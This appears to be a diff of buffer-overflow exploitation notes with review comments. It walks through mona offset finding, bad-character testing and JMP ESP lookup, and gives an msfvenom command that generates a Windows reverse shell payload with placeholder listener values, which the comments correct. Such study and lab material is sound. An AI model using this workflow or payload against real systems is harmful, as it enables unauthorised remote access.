Record value on EIP, select ESP and click "Follow in Dump"
@@ -12,17 +12,17 @@
12
12
Use !mona to find the offset after the overflow
13
13
!mona findmsp
14
14
15
-
### 4. Confirm EIP by adding "B" * 4 after the number of offset. Also, add a number of "C" to track the number of characters that can be added after EIP to confirm length of shellcode
15
+
**4. Confirm EIP by adding "B" * 4 after the number of offset. Also, add a number of "C" to track the number of characters that can be added after EIP to confirm length of shellcode**
16
16
17
-
### 5. Check bad characters after EIP. common bad characters are 0x00, 0x0A. Follow dump in ESP to check are there something missing after that.
17
+
**5. Check bad characters after EIP. common bad characters are 0x00, 0x0A. Follow dump in ESP to check are there something missing after that.**
18
18
Add code:
19
19
20
20
badchar = [0x00]
21
21
for ch in range (0x00 , 0xFF+1):
22
22
if ch not in badchar:
23
23
<payload> += chr(ch)
24
24
25
-
### 6. Find JMP ESP address in the system.
25
+
**6. Find JMP ESP address in the system.**
26
26
JMP ESP = FFE4
27
27
28
28
!mona jmp -r esp -cpb "\x00\x0A" << bad character
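Review bot: the bad-character list in the "Add code:" block under step 5 disagrees with the text around it: the heading names 0x00 and 0x0A as the common bad characters and the mona command on the last line excludes both (`-cpb "\x00\x0A"`), yet the snippet only seeds `badchar = [0x00]`. Either the list should carry every byte the step says to exclude, or the heading should say that the list starts with 0x00 and grows as each bad byte is confirmed in the ESP dump; as written a reader copying the snippet will skip 0x0A from the check. Separately, swapping `###` headings for `**bold**` paragraphs drops the steps out of the document outline (no anchor links, no heading hierarchy); if the goal was a smaller heading, a deeper heading level keeps the structure.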
@@ -38,13 +38,13 @@ Add code:
38
38
39
39
Run again to check is the breakpoint triggered
40
40
41
-
### 7. Add shellcode
41
+
**7. Add shellcode**
42
42
Add a few \x90 before shellcode to avoid shellcode being modify
43
43
44
44
msfvenom -p windows/shell_reverse_tcp LHOST=<IP>LPORT=<PORT> EXITFUNC=thread -f <Code Format> -a x86 -platform windows -b "\x00"
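Review bot: the msfvenom line at the end of this hunk has no space between `LHOST=<IP>` and `LPORT=<PORT>`, so the two settings are passed as one argument and the port is never set; it should read `LHOST=<IP> LPORT=<PORT>`. The documented long option is `--platform`, not `-platform`. The `-b "\x00"` list should also match the bad characters found in step 5, where the text and the mona command both exclude 0x00 and 0x0A; otherwise the generated payload can contain bytes that the earlier step showed are mangled. Minor wording: "avoid shellcode being modify" should be "avoid the shellcode being modified", and "check is the breakpoint triggered" should be "check whether the breakpoint is triggered".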